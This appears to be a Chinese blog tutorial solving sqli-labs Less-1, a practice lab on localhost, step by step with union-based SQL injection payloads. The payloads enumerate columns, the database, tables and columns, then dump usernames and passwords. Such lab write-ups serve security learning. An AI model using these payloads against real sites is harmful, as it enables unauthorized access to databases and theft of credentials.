SQL注入实例(sqli-labs/less-1)

初始网页

从网页可知传递的参数名为 id,并且为数字类型

1、得知数据表有多少列

1.1 使用联合查询查找列数(效率低)
sql 复制代码
http://localhost/sqli-labs-master/Less-1/?id=1' union select 1,2 --+
1.2 使用order by查找列数(效率高)
sql 复制代码
http://localhost/sqli-labs-master/Less-1/?id=1' order by 3 --+

2、查看回显位置

sql 复制代码
?id=-1' union select 1,2,3 --+

3、查询当前数据库名

sql 复制代码
?id=-1' union select 1,database(),3 --+

4、查询当前表名

sql 复制代码
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

5、查询列名

sql 复制代码
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--+

6、查询最终数据

sql 复制代码
?id=-1' union select 1,group_concat(username,0x3a,password),3 from users --+

其他

查询当前数据库版本

sql 复制代码
?id=-1' union select 1,version(),3 --+

查询当前登录用户

sql 复制代码
?id=-1' union select 1,user(),3 --+
相关推荐
Nturmoils26 分钟前
订单查询丢数据,查了半天原来是 WHERE 惹的祸
数据库·后端
ATA888835 分钟前
数据库管理工具的数据安全机制对比:权限管控与审计
数据库·人工智能·数据分析·数据库管理
麦聪聊数据1 小时前
业务自助取数(下):安全可控前提下,实现取数效率百倍提升
数据库·sql
2501_915716721 小时前
Repository-学习指南_小白版
数据库·人工智能
snpgroupcn1 小时前
SAP实施风险管控注意事项:四大风险域与防范策略
前端·数据库·人工智能
cyforkk2 小时前
MySQL锁机制详解:从乐观锁到悲观锁
数据库·mysql
ShiXZ2132 小时前
指令集-SQL 常用指令速查手册
数据库·sql·mysql·oracle
阿昭L2 小时前
数据库期末复习(三)
数据库
Dlrb12112 小时前
信息查询Web服务器-->电子商城信息查询项目
linux·服务器·数据库·html·嵌入式·epoll·数据查询
不会写DN2 小时前
MySQL 并发插入竞态问题:原子写入实践指南
数据库·mysql